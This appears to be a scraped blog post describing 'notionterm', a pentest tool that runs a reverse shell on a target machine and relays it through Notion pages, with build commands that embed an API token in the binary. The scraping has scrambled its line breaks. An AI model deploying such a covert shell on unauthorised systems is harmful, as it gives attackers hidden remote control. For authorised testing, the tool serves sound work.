Notionterm is a Embed Reverse Shell In Notion Pages
The focus was on making something fun while still being usable, but that’s not meant to be THE solution for reverse shell in the pentester’s arsenal
notionterm
and transfer it on target machine (see install)There are 3 main ways to run notionterm
:“normal” mode
Get terminal, stop/unstop it, etc…notionterm [flags]
Start the shell with the button widget: turn ON
, do you reverse shell stuff, turn OFF
to pause, turn ON
to resume etc…“server” mode
Ease notionterm embedding in any pagenotionterm --server [flags]
Start a shell session in any page by creating an embed block with URL containing the page id (CTRL+L
to get it): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID]
.light
mode
Only perform HTTP traffic from target → notionnotionterm light [flags]
As notionterm
is aimed to be run on target machine it must be built to fit with it.
Thus set env var to fit with the target requirement:
GOOS=[windows/linux/darwin]
Simple build
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go
You will need to set API key and notion page URL using either env var (NOTION_TOKEN
& NOTION_PAGE_URL
) or flags (--token
& --page-url
)
Embed directly the notion integration API token and notion page url in the binary. ⚠️ everybody with access to the binary can retrieved the token. For security reason don’t share it and remove it after use.
Set according env var:
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
And build it:
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go build notionterm.go
Pingora is a cutting-edge Rust framework designed to build fast, reliable, and programmable networked systems.…
DockerSpy is a powerful tool designed to perform Open Source Intelligence (OSINT) on Docker Hub,…
Anki is a powerful, open-source flashcard software designed to enhance learning and memory retention through…
Rolldown is an innovative JavaScript/TypeScript bundler written in Rust, designed to revolutionize the development workflow…
Invoke-ArgFuscator is an open-source, cross-platform PowerShell module designed to obfuscate command-line arguments for system-native executables.…
Morgan is an advanced JavaScript security analyzer designed to detect and mitigate sensitive data exposure…